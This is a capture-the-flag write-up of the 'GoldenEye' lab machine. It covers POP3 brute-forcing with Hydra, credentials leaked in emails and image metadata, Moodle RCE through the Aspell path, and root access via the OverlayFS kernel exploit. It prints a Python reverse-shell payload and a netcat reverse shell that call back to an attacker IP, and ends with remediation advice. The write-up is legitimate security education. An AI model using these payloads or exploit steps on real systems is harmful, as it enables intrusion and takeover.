Target IP: 10.201.20.3 (Requires /etc/hosts entry for severnaya-station.com) Difficulty: Hard (Enumeration Heavy) Objective: User & Root Flags

1. Executive Summary

“GoldenEye” is an Ubuntu-based machine hosting a custom web portal and a Moodle Learning Management System (LMS). Initial access is a multi-stage process involving dictionary attacks against a non-standard POP3 service to recover internal emails. These emails leak credentials and endpoints, eventually leading to an administrative account on the Moodle platform. Remote Code Execution (RCE) is achieved by exploiting a misconfiguration in the Aspell spellchecker path within Moodle. Privilege escalation exploits an outdated Linux Kernel (3.13) via the OverlayFS vulnerability (CVE-2015-1328).

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Discovering high ports (55006, 55007).
  • T1110 (Brute Force): Hydra attacks against POP3 accounts.
  • T1027 (Obfuscated Files or Information): Steganography in Exif data.
  • T1190 (Exploit Public-Facing App): Moodle “Aspell” Command Injection.
  • T1068 (Exploitation for Privilege Escalation): OverlayFS Kernel Exploit.

2. Operational Setup

Host Configuration

echo "10.201.20.3 severnaya-station.com" | sudo tee -a /etc/hosts

3. Enumeration: “The Email Chain”

A. Network Scanning

Your scan revealed the critical architecture:

  • 80/tcp: Web Server (GoldenEye Admin).
  • 55007/tcp: POP3 (Dovecot). This is the primary attack vector.

B. Phase 1: Boris

  1. Web Leak: /terminal.js revealed boris and encoded password InvincibleHack3r.
  2. Hydra: That password failed, but running Hydra found the correct POP3 pass.
  • User: boris
  • Pass: secret1!
  1. Intel: Emails from root, natalya, and alec.
  • Alec mentions sending access codes to xenia.

C. Phase 2: Natalya

  1. Hydra: You brute-forced natalya on port 55007.
  • Pass: bird
  1. Intel: Emails contained credentials for a new user, xenia.
  • User: xenia
  • Pass: RCP90rulez!
  • Target: severnaya-station.com/gnocertdir (Moodle).

D. Phase 3: Doak

  1. xenia’s credentials didn’t work on POP3. You moved to doak.
  2. Hydra:
  • Pass: goat
  1. Intel: An email to James Bond (007).
  • User: dr_doak
  • Pass: 4England!
  • Target: Login to the training site (Moodle).

4. Initial Access: Moodle Exploitation

A. Steganography (The Admin Password)

Logging into Moodle as dr_doak revealed s3cret.txt, pointing to /dir007key/for-007.jpg.

  1. Download: wget http://severnaya-station.com/dir007key/for-007.jpg
  2. Exif Analysis:
exiftool for-007.jpg
# OR
strings for-007.jpg | grep "Image Description"
  1. Result: Base64 string eFdpbnRlcjE5OTV4IQ==.
  2. Decode: xWinter1995x!
  • Usage: This is the password for the Moodle admin user.

B. Remote Code Execution (Aspell)

We log in to Moodle as admin : xWinter1995x!. This version of Moodle allows Admins to define the path to the spellchecker (aspell). We can replace this path with a reverse shell command.

The Exploit Steps:

  1. Navigate: Site Administration -> Server -> System Paths.
  2. Payload: In the “Path to aspell” field, inject a reverse shell.
# Payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.YOUR.IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

(Note: Sometimes simple netcat works: nc -e /bin/bash 10.10.x.x 4444) 3. Trigger:

  • Open any course or forum.
  • Create a post/page using the TinyMCE editor.
  • Click the “Spellcheck” button (ABC with a checkmark).
  • Troubleshooting: You mentioned the editor was lagging. This happens because the server is trying to execute your shell instead of checking spelling. If the shell connects, the HTTP request hangs until you close the shell.

Status: Shell as www-data.


5. Privilege Escalation: OverlayFS

Enumeration

Once inside, we check the OS version.

uname -a
# Linux ubuntu 3.13.0-32-generic ... 2014

Kernel 3.13.0 is infamously vulnerable to OverlayFS (CVE-2015-1328).

Exploitation

  1. Transfer Exploit: Host 37292.c (from Exploit-DB) on your attacker machine.
# Attacker
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
python3 -m http.server 80
# Victim
cd /tmp
wget http://10.10.YOUR.IP/37292.c
  1. Compile:
gcc 37292.c -o overlay
  1. Run:
./overlay

Result:

# whoami
root

Flags:

  • User: /home/<user>/user.txt (or inside the Moodle files).
  • Root: /root/root.txt.

6. Remediation (Blue Team)

  1. Patch Management:
  • Kernel: Update the Linux Kernel immediately to patch CVE-2015-1328.
  • Moodle: Update Moodle to a version that validates the “Aspell Path” or restricts access to sensitive server settings.
  1. Service Hardening:
  • POP3: Enforce strong password policies to prevent dictionary attacks (Hydra). Implement Fail2Ban to block repeated failed login attempts.
  • Ports: Change default ports is “Security by Obscurity.” Use standard ports with proper ACLs instead.
  1. Information Leakage:
  • Remove sensitive comments from HTML source code (/terminal.js, index.html).
  • Scrub metadata (Exif) from public images (for-007.jpg).